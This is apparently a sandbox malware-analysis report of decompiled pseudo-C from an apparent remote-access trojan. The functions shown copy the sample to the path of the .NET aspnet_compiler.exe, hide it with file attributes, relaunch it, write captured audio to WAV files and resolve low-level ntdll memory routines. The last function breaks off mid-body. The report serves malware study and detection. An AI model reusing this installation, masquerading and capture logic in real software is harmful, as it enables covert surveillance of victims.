				int _t45;
				int _t48;
				WCHAR* _t54;
				int _t55;
				void* _t70;
				void* _t130;
				void* _t131;
				void* _t135;

				_t135 =  &_v56;
				_t130 = __edx;
				_v49 = __ecx;
				_t22 = E0043A3D6(__edx);
				_t139 = _t22;
				if(_t22 == 0) {
					_t73 = _a4;
					_t125 = _v49;
					_t23 = E0040CF38( &_v24, _v49, _a4);
					_t131 = 0x473220;
					E00401EF3(0x473220, _v49, 0x473220, _t23);
				} else {
					CreateDirectoryW(E00401EE4(0x473250), 0);
					_t73 = _a4;
					_t125 = E004087F0( &_v24, 0x473250, 0x473250, "\\");
					_t70 = E00402FF4(_a4,  &_v48, _t69, _t130, 0x473250, _t139, _t73);
					_t131 = 0x473220;
					E00401EF3(0x473220, _t69, 0x473220, _t70);
					E00401EE9();
				}
				E00401EE9();
				if(E0043E224(E00401EE4(_t131), 0x470b38, _t26) != 0) {
					_t28 = E00401EE4(_t131);
					_t134 = CopyFileW;
					_t29 = CopyFileW(0x470b38, _t28, 0);
					__eflags = _t29;
					if(_t29 != 0) {
						L14:
						_push(E00401EE4(0x473208));
						E0040C21B(0x473208);
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							_t43 = E00401EE4(_t131);
							_t73 = SetFileAttributesW;
							SetFileAttributesW(_t43, 7);
							_t45 = E0043A3D6(_t130);
							__eflags = _t45;
							if(_t45 != 0) {
								SetFileAttributesW(E00401EE4(0x473250), 7);
							}
						}
						__eflags = _a12;
						if(_a12 != 0) {
							E0040415E(_t73, _t135 - 0x1c, _t125, _t134, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
							_push(L"del");
							E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v28, 0x473238)));
							E00401EE9();
						}
						CloseHandle( *0x470d44);
						_t35 = ShellExecuteW(0, L"open", E00401EE4(_t131), 0x46a8f0, 0x46a8f0, 1);
						__eflags = _t35 - 0x20;
						if(_t35 > 0x20) {
							ExitProcess(0);
						} else {
							E0040C577();
							L13:
							return 0;
						}
					}
					__eflags = _v49 - 0x36;
					if(_v49 == 0x36) {
						goto L14;
					}
					_t48 = E0043A3D6(_t130);
					_t125 = 0x36;
					__eflags = _t48;
					if(_t48 == 0) {
						E00401EF3(_t131, 0x36, _t131, E0040CF38( &_v24, 0x36, _t73));
					} else {
						E00401EF3(0x473250, 0x36, _t131, E0040CF38( &_v24, 0x36, _t130));
						E00401EE9();
						_t125 = E004087F0( &_v52, 0x473250, CopyFileW, "\\");
						E00401EF3(_t131, _t60, _t131, E00402FF4(_t73,  &_v28, _t60, _t130, CopyFileW, __eflags, _t73));
						E00401EE9();
					}
					E00401EE9();
					CreateDirectoryW(E00401EE4(0x473250), 0);
					_t54 = E00401EE4(_t131);
					_t73 = 0x470b38;
					_t55 = CopyFileW(0x470b38, _t54, 0);
					__eflags = _t55;
					if(_t55 != 0) {
						goto L14;
					} else {
						L004086CB(0x470b38, _t131, _t125, 0x470b38);
						goto L13;
					}
				} else {
					_push(E00401EE4(0x473208));
					E0040C21B(0x473208);
					return 1;
				}
			}




























                    0x0040c307
                    0x0040c30e
                    0x0040c310
                    0x0040c315
                    0x0040c320
                    0x0040c322
                    0x0040c36e
                    0x0040c376
                    0x0040c37b
                    0x0040c381
                    0x0040c389
                    0x0040c324
                    0x0040c32e
                    0x0040c334
                    0x0040c34a
                    0x0040c350
                    0x0040c356
                    0x0040c35e
                    0x0040c367
                    0x0040c367
                    0x0040c392
                    0x0040c3ae
                    0x0040c3d1
                    0x0040c3d8
                    0x0040c3de
                    0x0040c3e0
                    0x0040c3e2
                    0x0040c4a7
                    0x0040c4b1
                    0x0040c4b3
                    0x0040c4b8
                    0x0040c4bf
                    0x0040c4c5
                    0x0040c4ca
                    0x0040c4d1
                    0x0040c4d4
                    0x0040c4da
                    0x0040c4dc
                    0x0040c4eb
                    0x0040c4eb
                    0x0040c4dc
                    0x0040c4ed
                    0x0040c4f2
                    0x0040c4fe
                    0x0040c503
                    0x0040c524
                    0x0040c530
                    0x0040c530
                    0x0040c53b
                    0x0040c559
                    0x0040c55f
                    0x0040c562
                    0x0040c570
                    0x0040c564
                    0x0040c564
                    0x0040c4a0
                    0x00000000
                    0x0040c4a0
                    0x0040c562
                    0x0040c3e8
                    0x0040c3ed
                    0x00000000
                    0x00000000
                    0x0040c3f4
                    0x0040c3f9
                    0x0040c400
                    0x0040c402
                    0x0040c461
                    0x0040c404
                    0x0040c411
                    0x0040c41a
                    0x0040c434
                    0x0040c443
                    0x0040c44c
                    0x0040c451
                    0x0040c46a
                    0x0040c47c
                    0x0040c486
                    0x0040c48c
                    0x0040c492
                    0x0040c494
                    0x0040c496
                    0x00000000
                    0x0040c498
                    0x0040c49b
                    0x00000000
                    0x0040c49b
                    0x0040c3b0
                    0x0040c3ba
                    0x0040c3bc
                    0x00000000
                    0x0040c3c3

                    APIs
                    • _wcslen.LIBCMT ref: 0040C315
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040C32E
                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040C3DE
                    • _wcslen.LIBCMT ref: 0040C3F4
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040C47C
                    • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040C492
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4D1
                    • _wcslen.LIBCMT ref: 0040C4D4
                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4EB
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00473298,0000000B), ref: 0040C53B
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000001), ref: 0040C559
                    • ExitProcess.KERNEL32 ref: 0040C570
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                    • String ID: 2G$ 2G$6$82G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$P2G$P2G$P2G$P2G$P2G$del$open
                    • API String ID: 1579085052-2098281891
                    • Opcode ID: 8dd23fb663a3ad3535246375ec9facad4d9fd691e8f5c0ae58ccb9c53b3d1aea
                    • Instruction ID: 2a47eddb00df912b126377051a92c71841ea904bf6b40c506a6d22bed5b78104
                    • Opcode Fuzzy Hash: 8dd23fb663a3ad3535246375ec9facad4d9fd691e8f5c0ae58ccb9c53b3d1aea
                    • Instruction Fuzzy Hash: 3E51C461204340ABD614B7B2EC92A7F2399AF90708F10843FF805A62D3DF7C9D0592AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419BA2 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E00419BA2(void* __ecx, void* __edx, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* _v128;
				char _v176;
				char _v192;
				void* _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t26;
				void* _t41;
				long _t45;
				void* _t61;
				void* _t65;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;

				_t101 = __edx;
				_t114 =  &_v124;
				_t108 = __ecx;
				_t110 = __edx;
				if(E00419DF7( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t61 = E00401EE4( &_a4);
					_t101 = 0x30;
					E00401EF3( &_a4, 0x30, _t110, E0040CF38( &_v124, 0x30, _t61));
					E00401EE9();
				}
				_t23 = E0040245C();
				_t119 = _t23;
				if(_t23 == 0) {
					__eflags = PathFileExistsW(E00401EE4( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402073(_t65, _t114 - 0x18, _t101, _t112, 0x464074);
						_push(0xa8);
						E00404A81(0x4738d0, _t101, __eflags);
					}
				} else {
					E0041AE6B(_t110, E00401EE4( &_a4));
					L4:
					_t26 = E0041A7B9( &_v28, _t108);
					_t106 = E00402F85( &_v124, E00402FF4(_t65,  &_v76, E0040AEF6( &_v52, L"open \"", _t112,  &_a4), _t108, _t112, _t119, L"\" type "), _t26);
					E00402FF4(_t65,  &_v100, _t30, _t108, _t112, _t119, L" alias audio");
					E00401EE9();
					E00401EE9();
					E00401EE9();
					E00401EE9();
					mciSendStringW(E00401EE4( &_v100), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402073(0, _t114 - 0x18, _t30, _t112, 0x464074);
					_push(0xa9);
					E00404A81(0x4738d0, _t106, 0);
					_t41 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x472acc = _t41;
						while(1) {
							_t121 = _t41;
							if(_t41 == 0) {
								break;
							}
							__eflags =  *0x472ac9;
							if( *0x472ac9 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x472ac9 = 0;
							}
							__eflags =  *0x472ac8;
							if( *0x472ac8 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x472ac8 = 0;
							}
							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
							_t45 = E0043E5D0( &_v192, "stopped");
							__eflags = _t45;
							if(_t45 == 0) {
								SetEvent( *0x472acc);
							}
							__eflags = WaitForSingleObject( *0x472acc, 0x1f4);
							if(__eflags != 0) {
								_t41 =  *0x472acc;
							} else {
								CloseHandle( *0x472acc);
								_t41 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402073(0, _t115 - 0x18, _t106, 0x4738d0, 0x464074);
						_push(0xaa);
						E00404A81(0x4738d0, _t106, _t121);
						E00401EE9();
						goto L19;
					}
				}
				L19:
				return E00401EE9();
			}


























                    0x00419ba2
                    0x00419ba2
                    0x00419baa
                    0x00419bac
                    0x00419bbe
                    0x00419bc7
                    0x00419bcd
                    0x00419be1
                    0x00419bea
                    0x00419bea
                    0x00419bf1
                    0x00419bfd
                    0x00419bff
                    0x00419cef
                    0x00419cf1
                    0x00000000
                    0x00419cf7
                    0x00419d01
                    0x00419d06
                    0x00419d10
                    0x00419d10
                    0x00419c05
                    0x00419c0e
                    0x00419c13
                    0x00419c1e
                    0x00419c58
                    0x00419c5e
                    0x00419c68
                    0x00419c71
                    0x00419c7a
                    0x00419c83
                    0x00419c97
                    0x00419cab
                    0x00419cad
                    0x00419cb8
                    0x00419cc2
                    0x00419cc9
                    0x00419cd3
                    0x00419cd9
                    0x00419cd9
                    0x00419cd9
                    0x00419da7
                    0x00419da7
                    0x00419da9
                    0x00000000
                    0x00000000
                    0x00419d1a
                    0x00419d20
                    0x00419d2a
                    0x00419d2c
                    0x00419d2c
                    0x00419d32
                    0x00419d38
                    0x00419d42
                    0x00419d44
                    0x00419d44
                    0x00419d57
                    0x00419d63
                    0x00419d6a
                    0x00419d6c
                    0x00419d74
                    0x00419d74
                    0x00419d8b
                    0x00419d8d
                    0x00419da2
                    0x00419d8f
                    0x00419d95
                    0x00419d9b
                    0x00000000
                    0x00419d9b
                    0x00419d8d
                    0x00419db7
                    0x00419dc1
                    0x00419dc9
                    0x00419dce
                    0x00419dd5
                    0x00419dde
                    0x00000000
                    0x00419dde
                    0x00419cd9
                    0x00419de3
                    0x00419df6

                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00419C97
                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419CAB
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00464074), ref: 00419CD3
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000), ref: 00419CE9
                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419D2A
                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00419D42
                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00419D57
                    • SetEvent.KERNEL32 ref: 00419D74
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 00419D85
                    • CloseHandle.KERNEL32 ref: 00419D95
                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419DB7
                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00419DC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                    • API String ID: 738084811-1354618412
                    • Opcode ID: c111dab898de266138d49a17fad6d12c9f763f368d8fd7dbb43e8f2d80fe68a2
                    • Instruction ID: 455b6cfaa5a4d4cea25ac99553b3555d96430d1d1c5ac1129c3b59e21b3d00b1
                    • Opcode Fuzzy Hash: c111dab898de266138d49a17fad6d12c9f763f368d8fd7dbb43e8f2d80fe68a2
                    • Instruction Fuzzy Hash: 8751C5712442056FD214F761EC92EAF369DEB80348F10443FF546A21E2EE789D898A6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E00401A4D(WCHAR* __ecx, signed int __edx) {
				void _v4;
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				long _v28;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x470aaa & 0x0000ffff;
				_t83 = ( *0x470ab6 & 0x0000ffff) * _t80;
				_v16 = 1;
				_v20 = 0x10;
				_v12 = _t83 *  *0x470aac >> 3;
				asm("cdq");
				_v8 = _t83 + (__edx & 0x00000007) >> 3;
				_t5 =  &(_t75[1]); // 0x0
				_t36 =  *_t5 * _t80;
				_v4 = _t36;
				_v24 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					_push(0);
					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
					WriteFile(_t81, 0x470aaa, 2,  &_v28, 0);
					WriteFile(_t81, 0x470aac, 0,  &_v28, 0);
					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
					WriteFile(_t81, 0x470ab6, 2,  &_v28, 0);
					WriteFile(_t81, "data", 0,  &_v28, 0);
					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
					_t28 =  &(_t75[1]); // 0x0
					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}















                    0x00401a5a
                    0x00401a5d
                    0x00401a66
                    0x00401a74
                    0x00401a8a
                    0x00401a95
                    0x00401a9b
                    0x00401aa4
                    0x00401aa8
                    0x00401aab
                    0x00401aae
                    0x00401ab5
                    0x00401abf
                    0x00401ac4
                    0x00401ad7
                    0x00401ae3
                    0x00401af3
                    0x00401b03
                    0x00401b13
                    0x00401b23
                    0x00401b34
                    0x00401b45
                    0x00401b55
                    0x00401b65
                    0x00401b76
                    0x00401b87
                    0x00401b97
                    0x00401ba7
                    0x00401bb0
                    0x00401bb6
                    0x00401bb9
                    0x00000000
                    0x00401bbf
                    0x00000000

                    APIs
                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                    • WriteFile.KERNEL32(00000000,00470AAA,00000002,00000000,00000000), ref: 00401B45
                    • WriteFile.KERNEL32(00000000,00470AAC,00000004,00000000,00000000), ref: 00401B55
                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                    • WriteFile.KERNEL32(00000000,00470AB6,00000002,00000000,00000000), ref: 00401B87
                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Write$Create
                    • String ID: RIFF$WAVE$data$fmt
                    • API String ID: 1602526932-4212202414
                    • Opcode ID: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                    • Instruction ID: bbc7d4a3c977ff0e2710d2a536ed23c0b0e069a4161f47bce29e1ad9506f00c9
                    • Opcode Fuzzy Hash: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                    • Instruction Fuzzy Hash: 8D412EB2654318BAE210DE51DD85FBB7EECEB85B50F40441AFA44D60C0D7A4E909DBB3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004068E4 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004068E4() {
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t15;
				WCHAR* _t17;

				_t17 = L"ntdll.dll";
				_t4 = GetProcAddress(GetModuleHandleW(_t17), "RtlInitUnicodeString");
				 *0x470afc = _t4;
				if(_t4 != 0) {
					_t6 = GetProcAddress(GetModuleHandleW(_t17), "NtAllocateVirtualMemory");
					 *0x470b00 = _t6;
					if(_t6 == 0) {
						goto L1;
					}
					_t9 = GetProcAddress(GetModuleHandleW(_t17), "NtFreeVirtualMemory");
					 *0x470b0c = _t9;
					if(_t9 == 0) {
						goto L1;
					}
					_t11 = GetProcAddress(GetModuleHandleW(_t17), "RtlAcquirePebLock");
					 *0x470b04 = _t11;
					if(_t11 == 0) {
						goto L1;
					}
					_t13 = GetProcAddress(GetModuleHandleW(_t17), "RtlReleasePebLock");
					 *0x470b10 = _t13;
					if(_t13 == 0) {
						goto L1;
					}
					_t15 = GetProcAddress(GetModuleHandleW(_t17), "LdrEnumerateLoadedModules");
					 *0x470af8 = _t15;
					return 0 | _t15 != 0x00000000;
				}
				L1:
				return 0;
			}










                    0x004068ec
                    0x00406901
                    0x00406903
                    0x0040690a
                    0x00406919
                    0x0040691b
                    0x00406922
                    0x00000000
                    0x00000000
                    0x0040692d
                    0x0040692f
                    0x00406936
                    0x00000000
                    0x00000000
                    0x00406941
                    0x00406943
                    0x0040694a
                    0x00000000
                    0x00000000
                    0x00406955
                    0x00406957
                    0x0040695e
                    0x00000000
                    0x00000000
                    0x00406969
                    0x0040696d
                    0x00000000
                    0x00406977
                    0x0040690c
                    0x00000000

                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,00406CC1,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,00406CE9,00473220,00406D42), ref: 004068F8
                    • GetProcAddress.KERNEL32(00000000), ref: 00406901
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 00406916
                    • GetProcAddress.KERNEL32(00000000), ref: 00406919
                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 0040692A
                    • GetProcAddress.KERNEL32(00000000), ref: 0040692D
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 0040693E
                    • GetProcAddress.KERNEL32(00000000), ref: 00406941
                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00406952
                    • GetProcAddress.KERNEL32(00000000), ref: 00406955
                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 00406966
                    • GetProcAddress.KERNEL32(00000000), ref: 00406969
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                    • API String ID: 1646373207-3272542945
                    • Opcode ID: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                    • Instruction ID: df219cf26e896b26ca7b17cc0f8dfcb6cf109bc3019751d44b8154791cbbdf11
                    • Opcode Fuzzy Hash: c5d62d6da54eaf1f5e298c1ce3456973680903e04872b744077958239b2d5770
                    • Instruction Fuzzy Hash: 190175E1A4130AAADB10777A6C58D476EDC9EA13503120937B405E2691EEBCD8908D6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044DCAD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E0044DCAD(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E004371B0(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0043EEAD())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x4704e0; // 0xec46b8
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x4704ec; // 0xec46b8
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x4704e0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E0044E355(_t298);
												E00445002(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										E00445002( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E0044E355(_t298);
											E00445002(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x4704e0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E004443F4(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												E00445002(_t300);
												goto L12;
											} else {
												_t131 = E0044030E(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043A5E8();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00456277(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0043EEAD())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x4704e4; // 0xecda90
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x4704e8; // 0xec49d0
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x4704e4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E0044E2E8(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
